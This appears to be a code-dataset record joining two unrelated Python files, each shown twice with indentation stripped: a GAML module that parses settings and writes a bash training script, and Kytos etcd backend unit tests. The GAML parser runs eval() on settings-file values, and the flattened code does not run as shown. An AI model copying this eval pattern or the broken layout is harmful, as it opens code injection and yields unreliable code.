sub = line if line.find('#') == -1 else line[:line.find('#')]
sub = sub.strip()
if len(sub) == 0: continue
if sub.find('=') == -1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
lp = sub.split('=',maxsplit=1)
partmp = lp[0].split()
if len(partmp) != 1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
key = partmp[0].lower()
if key not in parlist:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
stmp = lp[1]
lt = stmp.split()
if len(lt) != 0:
# take care of python representation string list to real python list
if key == 'symmetry_list' or key == 'counter_list' or key == 'offset_list':
try:
s = eval(stmp)
except:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
self.parameters[key] = s
# special case for bash print out
self.parameters[key + 'RAW'] = stmp.strip()
elif key == 'pn_limit' or key == 'gromacs_energy_kw' or key == 'literature_value':
self.parameters[key] = ' '.join(lt)
elif len(lt) != 1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
else:
self.parameters[key] = lt[0]
def proparameters(self):
cwd = os.getcwd()
for par,name in self.parameters.items():
if 'path' in par and name is not None:
filepath = self.parameters[par]
head,base = os.path.split(filepath)
if os.path.isfile(filepath):
if os.path.islink(base) or (not os.path.isfile(base)):
shutil.copy(filepath,cwd)
self.parameters[par] = base
else:
print('Error: cannot find the file ' + self.parameters[par])
raise ValueError('wrong defined')
def trial(self):
# Make a copy and add a key for Charge_gen_scheme
pardir = { **self.parameters }
pardir['charge_path'] = pardir['charge_range_path']
tp = Charge_gen_scheme(**pardir)
tp.run()
pardir['charge_path'] = tp.chargepair
pardir['toppath'] = pardir['top_liq_path']
tp = File_gen_gromacstop(**pardir)
tp.run()
def file_print(self):
pf = file_gen_new(self.fname,fextend='sh')
with open(pf,mode='wt') as f:
f.write('#!/bin/bash\n')
f.write('# -*- coding: utf-8 -*-\n\n')
for key in sorted(self.parameters):
if 'RAW' in key:
pass
elif self.parameters[key] is None:
f.write("{:}= \n".format(key))
else:
if key == 'symmetry_list' or key == 'counter_list' or key == 'offset_list':
f.write("{:}='{:}'\n".format(key,self.parameters[key+'RAW']))
elif key == 'pn_limit' or key == 'gromacs_energy_kw' or key == 'literature_value':
f.write("{:}='{:}'\n".format(key,self.parameters[key]))
else:
f.write('{:}={:}\n'.format(key,self.parameters[key]))
f.write('\n\n\n')
f.write(self.shfile)
print('Note: new file < {:} >'.format(pf))
print('it can be directly executed for auto-training') | GAML/gaml_autotrain.py | from GAML.functions import file_size_check, file_gen_new
from GAML.file_gen_gromacstop import File_gen_gromacstop
from GAML.charge_gen_scheme import Charge_gen_scheme
import os
import shutil
from pkg_resources import resource_string
class GAML_autotrain(object):
def __init__(self,*args,**kwargs):
if 'file_path' not in kwargs or kwargs['file_path'] is None:
raise ValueError('no inputs, file_path is missing')
self.file = kwargs['file_path'].strip()
file_size_check(self.file,fsize=2)
if 'fname' in kwargs and kwargs['fname'] is not None:
self.fname = kwargs['fname'].strip()
if len(self.fname) == 0: self.fname = 'bash_GAML_AutoTraining'
else:
self.fname = 'bash_GAML_AutoTraining'
self.parameters = {
'top_gas_path' : None,
'top_liq_path' : None,
'top_fep_path' : None,
'gro_gas_path' : None,
'gro_liq_path' : None,
'gro_fep_path' : None,
'grompp_min_gas_path' : None,
'grompp_min_liq_path' : None,
'grompp_nvt_liq_path' : None,
'grompp_npt_liq_path' : None,
'grompp_prod_gas_path' : None,
'grompp_prod_liq_path' : None,
'grompp_fep_min_steep_path' : None,
'grompp_fep_min_lbfgs_path' : None,
'grompp_fep_nvt_path' : None,
'grompp_fep_npt_path' : None,
'grompp_fep_prod_path' : None,
'charge_range_path' : None,
'gromacs_energy_kw' : 'Density',
'literature_value' : 1000,
'gmx' : 'gmx',
'MAE' : 0.05,
'training_total_nm' : 5,
'training_cnt' : 1,
'gennm' : 10,
'error_tolerance' : 0.5,
'symmetry_list' : None,
'pn_limit' : None,
'counter_list' : None,
'offset_list' : None,
'offset_nm' : None,
'ratio' : None,
'nmround' : None,
'total_charge' : 0.0,
'charge_extend_by' : None,
'threshold' : None,
'bool_neutral' : None,
'bool_nozero' : None,
'bool_abscomp' : None,
'reschoose' : None,
'analysis_begintime' : None,
'analysis_endtime' : None,
}
# check for the bash scripts
bo = True
if 'bashinterfile' in kwargs and kwargs['bashinterfile'] is not None:
self.bashinterfile = kwargs['bashinterfile'].strip()
if len(self.bashinterfile) == 0:
self.bashinterfile = 'GAML-BASH-Interface.sh'
else:
bo = False
else:
self.bashinterfile = 'GAML-BASH-Interface.sh'
if bo:
self.shfile = resource_string(__name__,'scripts/'+self.bashinterfile).decode('utf-8').replace('\r','')
else:
file_size_check(self.bashinterfile,fsize=10)
with open(self.bashinterfile,mode='rt') as f: self.shfile = f.read()
self.profile()
self.proparameters()
self.trial()
def run(self):
"""method place holder"""
pass
def profile(self):
"""Process input auto-settingfile"""
errinfo = 'Error: wrong defined settingfile\n'
parlist = [k for k in self.parameters]
with open(self.file,mode='rt') as f:
while True:
line = f.readline()
if len(line) == 0:
break
sub = line if line.find('#') == -1 else line[:line.find('#')]
sub = sub.strip()
if len(sub) == 0: continue
if sub.find('=') == -1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
lp = sub.split('=',maxsplit=1)
partmp = lp[0].split()
if len(partmp) != 1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
key = partmp[0].lower()
if key not in parlist:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
stmp = lp[1]
lt = stmp.split()
if len(lt) != 0:
# take care of python representation string list to real python list
if key == 'symmetry_list' or key == 'counter_list' or key == 'offset_list':
try:
s = eval(stmp)
except:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
self.parameters[key] = s
# special case for bash print out
self.parameters[key + 'RAW'] = stmp.strip()
elif key == 'pn_limit' or key == 'gromacs_energy_kw' or key == 'literature_value':
self.parameters[key] = ' '.join(lt)
elif len(lt) != 1:
print(errinfo + 'Error line: ' + line)
raise ValueError('wrong input')
else:
self.parameters[key] = lt[0]
def proparameters(self):
cwd = os.getcwd()
for par,name in self.parameters.items():
if 'path' in par and name is not None:
filepath = self.parameters[par]
head,base = os.path.split(filepath)
if os.path.isfile(filepath):
if os.path.islink(base) or (not os.path.isfile(base)):
shutil.copy(filepath,cwd)
self.parameters[par] = base
else:
print('Error: cannot find the file ' + self.parameters[par])
raise ValueError('wrong defined')
def trial(self):
# Make a copy and add a key for Charge_gen_scheme
pardir = { **self.parameters }
pardir['charge_path'] = pardir['charge_range_path']
tp = Charge_gen_scheme(**pardir)
tp.run()
pardir['charge_path'] = tp.chargepair
pardir['toppath'] = pardir['top_liq_path']
tp = File_gen_gromacstop(**pardir)
tp.run()
def file_print(self):
pf = file_gen_new(self.fname,fextend='sh')
with open(pf,mode='wt') as f:
f.write('#!/bin/bash\n')
f.write('# -*- coding: utf-8 -*-\n\n')
for key in sorted(self.parameters):
if 'RAW' in key:
pass
elif self.parameters[key] is None:
f.write("{:}= \n".format(key))
else:
if key == 'symmetry_list' or key == 'counter_list' or key == 'offset_list':
f.write("{:}='{:}'\n".format(key,self.parameters[key+'RAW']))
elif key == 'pn_limit' or key == 'gromacs_energy_kw' or key == 'literature_value':
f.write("{:}='{:}'\n".format(key,self.parameters[key]))
else:
f.write('{:}={:}\n'.format(key,self.parameters[key]))
f.write('\n\n\n')
f.write(self.shfile)
print('Note: new file < {:} >'.format(pf))
print('it can be directly executed for auto-training') | 0.164215 | 0.076857 |
from unittest import TestCase
from unittest.mock import MagicMock, patch
from napps.kytos.storehouse.backends.etcd import (Etcd, join_fullname,
split_fullname)
from napps.kytos.storehouse.main import Box
# pylint: disable=protected-access, unused-argument, no-member
class TestEtcd(TestCase):
"""Tests for the Etcd class."""
# pylint: disable=arguments-differ
@patch('napps.kytos.storehouse.backends.etcd.etcd3.client')
def setUp(self, mock_client):
"""Execute steps before each tests."""
mock_client.return_value = MagicMock()
self.base = Etcd()
# 'metadata' is the name of the one of objects obtained at tuple
# returned by the etcd get_all method.
self.metadata = MagicMock()
self.metadata.key = b'namespace.123'
self.base.etcd.get_all.return_value = [(b'', self.metadata)]
def test_get_all_keys(self):
"""Test _get_all_keys method."""
all_keys = self.base._get_all_keys()
self.assertEqual(b'namespace.123', next(all_keys))
@patch('pickle.dumps', return_value='raw_data')
def test_create(self, mock_dumps):
"""Test create method."""
box = Box('any', 'namespace', box_id='123')
self.base.create(box)
self.base.etcd.put.assert_called_with('namespace.123', 'raw_data')
@patch('pickle.loads', return_value='data')
def test_retrieve_success_case(self, mock_loads):
"""Test retrieve method to success case."""
self.base.etcd.get.return_value = ('raw_data', '')
box = Box('any', 'namespace', box_id='123')
retrieve = self.base.retrieve(box.namespace, box.box_id)
self.base.etcd.get.assert_called_with('namespace.123')
self.assertEqual(retrieve, 'data')
def test_retrieve_failure_case(self):
"""Test retrieve method to failure case."""
self.base.etcd.get.return_value = (None, '')
box = Box('any', 'namespace', box_id='123')
retrieve = self.base.retrieve(box.namespace, box.box_id)
self.base.etcd.get.assert_called_with('namespace.123')
self.assertIsNone(retrieve)
def test_delete(self):
"""Test delete method."""
box = Box('any', 'namespace', box_id='123')
self.base.delete(box.namespace, box.box_id)
self.base.etcd.delete.assert_called_with('namespace.123')
def test_list(self):
"""Test list method."""
obj = MagicMock()
obj.key = b'namespace.123'
self.base.etcd.get_prefix.return_value = [('', obj)]
list_return = self.base.list('namespace')
self.base.etcd.get_prefix.assert_called_with('namespace',
keys_only=True)
self.assertEqual(next(list_return), b'123')
def test_list_namespaces(self):
"""Test list_namespaces method."""
namespaces = self.base.list_namespaces()
self.assertEqual(namespaces, {b'namespace'})
@patch('pickle.loads')
def test_backup(self, mock_loads):
"""Test backup method."""
next(self.base.backup())
mock_loads.assert_called_with((b'', self.metadata))
def test_split_fullname(self):
"""Test split_fullname method."""
fullname = b'namespace.box_id'
split = split_fullname(fullname)
self.assertEqual(split, [b'namespace', b'box_id'])
def test_join_fullname(self):
"""Test join_fullname method to binary and string parameters."""
fullname_1 = join_fullname(b'namespace', b'box_id')
self.assertEqual(fullname_1, b'namespace.box_id')
fullname_2 = join_fullname('namespace', 'box_id')
self.assertEqual(fullname_2, 'namespace.box_id') | tests/unit/test_etcd.py | from unittest import TestCase
from unittest.mock import MagicMock, patch
from napps.kytos.storehouse.backends.etcd import (Etcd, join_fullname,
split_fullname)
from napps.kytos.storehouse.main import Box
# pylint: disable=protected-access, unused-argument, no-member
class TestEtcd(TestCase):
"""Tests for the Etcd class."""
# pylint: disable=arguments-differ
@patch('napps.kytos.storehouse.backends.etcd.etcd3.client')
def setUp(self, mock_client):
"""Execute steps before each tests."""
mock_client.return_value = MagicMock()
self.base = Etcd()
# 'metadata' is the name of the one of objects obtained at tuple
# returned by the etcd get_all method.
self.metadata = MagicMock()
self.metadata.key = b'namespace.123'
self.base.etcd.get_all.return_value = [(b'', self.metadata)]
def test_get_all_keys(self):
"""Test _get_all_keys method."""
all_keys = self.base._get_all_keys()
self.assertEqual(b'namespace.123', next(all_keys))
@patch('pickle.dumps', return_value='raw_data')
def test_create(self, mock_dumps):
"""Test create method."""
box = Box('any', 'namespace', box_id='123')
self.base.create(box)
self.base.etcd.put.assert_called_with('namespace.123', 'raw_data')
@patch('pickle.loads', return_value='data')
def test_retrieve_success_case(self, mock_loads):
"""Test retrieve method to success case."""
self.base.etcd.get.return_value = ('raw_data', '')
box = Box('any', 'namespace', box_id='123')
retrieve = self.base.retrieve(box.namespace, box.box_id)
self.base.etcd.get.assert_called_with('namespace.123')
self.assertEqual(retrieve, 'data')
def test_retrieve_failure_case(self):
"""Test retrieve method to failure case."""
self.base.etcd.get.return_value = (None, '')
box = Box('any', 'namespace', box_id='123')
retrieve = self.base.retrieve(box.namespace, box.box_id)
self.base.etcd.get.assert_called_with('namespace.123')
self.assertIsNone(retrieve)
def test_delete(self):
"""Test delete method."""
box = Box('any', 'namespace', box_id='123')
self.base.delete(box.namespace, box.box_id)
self.base.etcd.delete.assert_called_with('namespace.123')
def test_list(self):
"""Test list method."""
obj = MagicMock()
obj.key = b'namespace.123'
self.base.etcd.get_prefix.return_value = [('', obj)]
list_return = self.base.list('namespace')
self.base.etcd.get_prefix.assert_called_with('namespace',
keys_only=True)
self.assertEqual(next(list_return), b'123')
def test_list_namespaces(self):
"""Test list_namespaces method."""
namespaces = self.base.list_namespaces()
self.assertEqual(namespaces, {b'namespace'})
@patch('pickle.loads')
def test_backup(self, mock_loads):
"""Test backup method."""
next(self.base.backup())
mock_loads.assert_called_with((b'', self.metadata))
def test_split_fullname(self):
"""Test split_fullname method."""
fullname = b'namespace.box_id'
split = split_fullname(fullname)
self.assertEqual(split, [b'namespace', b'box_id'])
def test_join_fullname(self):
"""Test join_fullname method to binary and string parameters."""
fullname_1 = join_fullname(b'namespace', b'box_id')
self.assertEqual(fullname_1, b'namespace.box_id')
fullname_2 = join_fullname('namespace', 'box_id')
self.assertEqual(fullname_2, 'namespace.box_id') | 0.81538 | 0.352397 |